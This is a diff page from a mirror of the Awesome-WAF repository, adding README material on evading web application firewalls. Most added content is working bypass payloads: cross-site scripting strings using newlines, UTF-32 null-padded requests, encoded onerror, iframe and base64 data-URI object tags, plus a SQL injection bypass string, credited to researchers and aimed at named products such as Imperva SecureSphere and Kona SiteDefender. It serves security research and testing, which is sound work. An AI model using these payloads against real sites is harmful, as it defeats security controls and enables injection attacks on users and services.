Awesome-Mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2024-10-01 04:35:35 -04:00
Code Issues Packages Projects Releases Wiki Activity

Added more stuff

Browse Source
This commit is contained in:
0xInfection 2019-02-20 18:47:25 +05:30
parent ea9e7788dc
commit 6a7b4b0ad1
1 changed files with 23 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
README.md
View File

@ -1417,9 +1417,11 @@ Wanna detect WAFs? Lets see how.
</tr>
</table>
## Evasion Techniques
# Evasion Techniques
Lets look at some methods of bypassing and evading WAFs.
## Cross Site Scripting:
### Fuzzing/Bruteforcing:
#### Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
@ -1447,7 +1449,7 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
#### Techniques:
##### Keyword Filter Detection/Bypass
### Keyword Filter Detection/Bypass
__SQL Injection__
@ -1512,7 +1514,6 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
__Scenario 2: Cross Site Scripting__
##### Step 1:
- Normal deliberate test:
```
<script>alert()</script>
@ -1523,6 +1524,8 @@ __Scenario 2: Cross Site Scripting__
```
- Bypassing firewall regex with new line (`\r\n`):
```
<script>\r\nalert(1)</script>
<script>
alert(1)</script>
```
@ -1563,10 +1566,10 @@ script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert(1)"></script a=\u0
Example request:
<pre>
GET <b>/page.php?param=∀㸀㰀script㸀alert(1)㰀/script㸀</b> HTTP/1.1
GET <b>/page.php?p=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E</b> HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
<b>Accept-Charset:utf-32, iso-8859-1;q=0.5</b>
<b>Accept-Charset:utf-32; q=0.5</b>
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
</pre>
@ -1684,6 +1687,11 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
### __Imperva SecureSphere__
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
- XSS Bypass by [@Alra3ees](https://twitter.com/alra3ees)
```
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
- XSS Bypass by [@WAFNinja](https://waf.ninja)
```
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
@ -1693,6 +1701,10 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
```
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
```
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
```
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
@ -1892,6 +1904,12 @@ Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```
### __Kona SiteDefender__
- XSS Bypass by [@zseano](https://twitter.com/zseano)
```
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```
## Awesome Tools
### WAF Fingerprinting:
__1. Fingerprinting with [NMap](https://nmap.org)__: